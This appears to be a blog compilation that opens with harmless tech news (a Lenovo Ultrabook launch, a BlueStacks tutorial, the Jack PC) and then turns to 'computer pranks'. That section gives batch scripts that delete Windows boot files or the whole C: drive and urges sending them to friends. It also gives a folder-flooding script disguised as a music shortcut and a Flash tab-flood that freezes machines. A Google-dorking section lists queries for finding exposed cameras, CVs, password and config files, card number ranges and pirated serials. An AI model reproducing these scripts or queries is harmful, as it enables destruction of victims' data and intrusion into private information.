Lenovo launches IdeaPad U300s Ultrabook in India

After the Acer S3, Lenovo steps in the Ultrabook segment with the launch of the U300s. Available from all major retail outlets, the IdeaPad U300s is priced at Rs.67,900, plus taxes. The U300s is built from a single piece of aluminium that form the chassis, similar to the MacBook Air. Due to this, it has a thickness of just 14.9mm and weighs less than 1.3 kg. It also packs in some technologies like ‘Breathable Keyboard’, which uses Intel’s Advanced Cooling Technology, which allows air to flow in through the keyboard and out the sides and the rear hinge.

This design removes the need for vents on the underside of the notebook, making it ideal for long periods of use. The Lenovo Long Life Battery provides the U 300s up to 8 hours of productive use or 30 days on standby. With Lenovo RapidCharge, the battery can be charged to 50 percent capacity in just 30 minutes.

The 13.3-inch HD ready screen is LED backlit and the notebook is powered by Intel’s 2nd Generation Core i5 processor, 4GB of RAM and 128GB SSD. Along with that, we also have Bluetooth 3.0, Wi-Fi ‘n’, USB 3.0 and 2.0, HDMI, SRS Sound enhancement, Intel’s WiDi technology and finally, a 1.3MP webcam. Acer’s similarly speced Ultrabook is actually slightly cheaper, so it’s interesting to see what special Lenovo’s offering will bring to the table.

Run Android apps on Windows

Most Android-based smartphone users would agree that they would prefer testing an app before downloading it to their phone. The reason behind this is usually to avoid unnecessary space hogging apps. Some users might also wish to play some of the cool mobile games available for the Android platform on their PC i.e. on a larger display. In this tutorial, we’ll show you how can your favorite Android apps on your Windows-based PC using a simple and free software called BlueStacks.
Installing
Installing

BlueStacks is an app player for Windows, which can play Android apps faster than it can run on a phone and that too, on a full-screen. The app includes 10 pre-loaded apps and one can add up to 26 more apps of their choice. Favorite apps can be pushed directly from the phone onto the PC using an Android app via internet route. Download and install the software for Windows from the URL ‘www.bluestacks.com’. The software is nothing, but a simple virtual Android operating system, which simulates an Android phone or UI. It uses the desktop PC’s resources such as the processor, the internet connection, mouse, keyboard and the audio card. The installed folder located on the PC contains the necessary files for its use, namely the kernel, data, system, boot and storage (the SD card). The BlueStacks Android (Gingerbread) virtual machine creates a hardware environment with a limited amount of storage (around 363 MB) for installing apps and 262 MB of SD card storage space.

Once BlueStacks is installed, the application will be running the Android operating system in the background and you will see an icon in the system tray area and a widget will be running on your screen. A single click on the widget will reveal the Android system apps installed in it. Click on the apps and enjoy them on a large screen. Additional apps can be installed from the BlueStacks website by signing in using your Facebook account details. To get to this page, all you need to do is click on the BlueStacks widget, scroll to and click on the app icon/shortcut ‘Get more apps’. A website will open up where you can login using your Facebook details. Once logged in, simply click on the ‘Subscribe’ button for the available apps (in the Featured Apps section) and they shall automatically get installed on your system via the internet. The ‘Could Connect’ link on the same page will highlight a special 9-pin numerical code which needs to be entered on your Android phone running the BlueStacks Cloud Connect app (download it from the Android Market for free). Once done, you can push apps from your phone to your PC by simply selecting multiple apps and syncing it. That’s it! You can now enjoy all your favorite apps from your phone on your Windows desktop PC.

Note: There are a few (or many) apps that will not function on BlueStacks, due to reasons such as incompatible hardware (for example there is no wireless network available here and apps that need the wireless network will not function). Also a few apps cannot be installed under the free license of BlueStacks. The BlueStacks Pro version will be out soon and you can do a lot more on it. The free version has a maximum limit of 26 installable apps, while the pro version will have the possibility of installing unlimited apps.

A PC The Size of your Phone Jack?

Well, maybe it's a bit bigger than a phone jack, but this "desktop computer" is built to be installed in a wall, with cords for the mouse, the keyboard, the speakers and the monitor running out of it. And at peak use, it only draws about five watts of power.
Absolutely remarkable! The manufacturers of the Jack PC are calling it a "desktop" but it isn't quite what we think of as a computer. For one thing, it doesn't have a hard drive. So how does it work? Basically the Chip PC can either connect to a local network and use the files on a shared server, or it can operate by itself, but the only software it will run is Internet Explorer and you wont be able to save anything.

Remarkably, the Jack PC does not even require you to plug it in. Just like your old chorded phone ran on the juice from the phone line, this thing runs on the power from the Ethernet line and nothing more. An Ethernet line only deliversfive watts, so the Jack PC is guaranteed to never pull much more power than a digital alarm clock. But with an 800 mhz or 1.2 ghz processor, the device is no slouch either.

Its reliance on a central computer for storage and software means that the device is best used in offices. But think of the power a large office could save by using these little guys, not to mention the materials that would otherwise go into hulking desktops for every employee.
In time, as low-power flash drives become larger and more powerful, I can see a wall-mounted PC that pulls no more than five watts becoming the norm. It may have to connect to a central storage unit in every house, but the power drain from that would be no more than a television DVR unit.
The Jack PC seems provides both an intelligent technology that can and should be implemented today, as well as a glimpse into what we might all be using in the future.

Computer Pranks

Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;)

1. Crash a Computer System With Nothing But a URL!

I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.

WARNING: CLICKING ON THE LINK BELLOW MAY CAUSE A CRASH! USE AT YOUR OWN RISK!

2. Shut Down a Computer Forever

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friends computer and tell them to open it. Have fun!!

Here is another code too.....

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q

Paste it in NotePad And Save It with Extension .cmd or .bat

3. Make over 1,000 folders in few seconds

Here I will teach you simple prank that will make an unlimited amount of folders in any place you want.

1. Open notepad and type :

@echo off
:top
md %random%
goto top

@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop

2. Save it as 1000folders.bat

3. After that you will get icon that looks as show below

People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it

4. Right click on icon and click Create Shortcut

5. Right click on shortcut and click properties , then click on Change Icon and rename icon

Tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…

4. Microsoft Word Prank

How to use Google for Hacking.

How to use Google for Hacking.

Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.

1. Hacking Security Cameras

There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”
Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls.
you now have access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.
intitle:”Live View / – AXIS”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.

2. Hacking Personal and Confidential Documents

Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls

3. Hacking Google to gain access to Free Stuffs

Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.
“?intitle:index.of?mp3 eminem“
Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3″ with “pdf” or “zip” or “rar”.

4. Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find:
Credit Card Numbers
Passwords
Software / MP3′s
…… (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:”Index of” passwords modified
allinurl:authuserfile.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurl:passlist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

METHOD 2

put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

METHOD 3

put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

“# -FrontPage-” inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!

“AutoCreate=TRUE password=”

This searches the password for “Website Access Analyzer”, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author’s site at: coara.or.jp/~passy/ [or.jp]
“http://:@www” domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
Another way is by just typing
“http://bob:bob@www”
“sets mode: +k”
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb

Not all of these pages are administrator’s access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:authuserfile.txt
DCForum’s password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:”Index of” config.php
This search brings up sites with “config.php” files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:”htaccess|passwd|shadow|htusers” This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Let’s pretend you need a serial number for windows xp pro.
In the google search bar type in just like this – “Windows XP Professional” 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of ‘fake’ porn sites that trick you.
or if you want to find the serial for winzip 8.1 – “Winzip 8.1″ 94FBR
Credits and More Info http://johnny.ihackstuff.com
I have shown you this info to let you know that there is a real risk putting your info online. If you do want to buy stuff online make sure the site you are using is secure normally if a site is secure you will see a pop up saying you are now entering a secure part of the site or a symbal of a padlock at the bottom of your browser or just use pay pal, pay pal is very safe to use. But most of the time just use common sense if a site looks cheap it normally hasn’t got the protection to keep your info safe. I am not saying don’t buy stuff online because that is one of the best thing’s about the internet i am just saying be aware of websites that want your bank details and there is no symbal of a padlock at the bottom of your browser

5.Crash a Computer using Flash and Google.

Open up a new flash document. Open up the Actions panel for the stage of the first frame. If it’s in Actionscript 2, write the following:
onEnterFrame = function () {
getURL(“http://www.google.com”, “_blank”);
}
Or if it’s actionscript 3 write the following:
function openGoogle(e:Event):void {
navigateToURL(“http://www.google.com”, “_blank”);
}
stage.addEventListener(Event.ENTER_FRAME, openGoogle);
Press Control-Enter when you’re ready to crash your computer. What this does is repeatedly open up new tabs of Google. But it opens so many Google tabs every second that after maybe 20-30 seconds your computer will barely be able to respond to you mouse clicks or even mouse movements. Usually, any attempt to stop it will result in processing overload and cause the computer to freeze. The only real way to stop this is to force-quit BOTH flash.exe and iexplorer.exe. Some teachers may know enough to do this, but might accidentally close explorer.exe
hope you enjoyed this post. Pass your comments. Cheers!
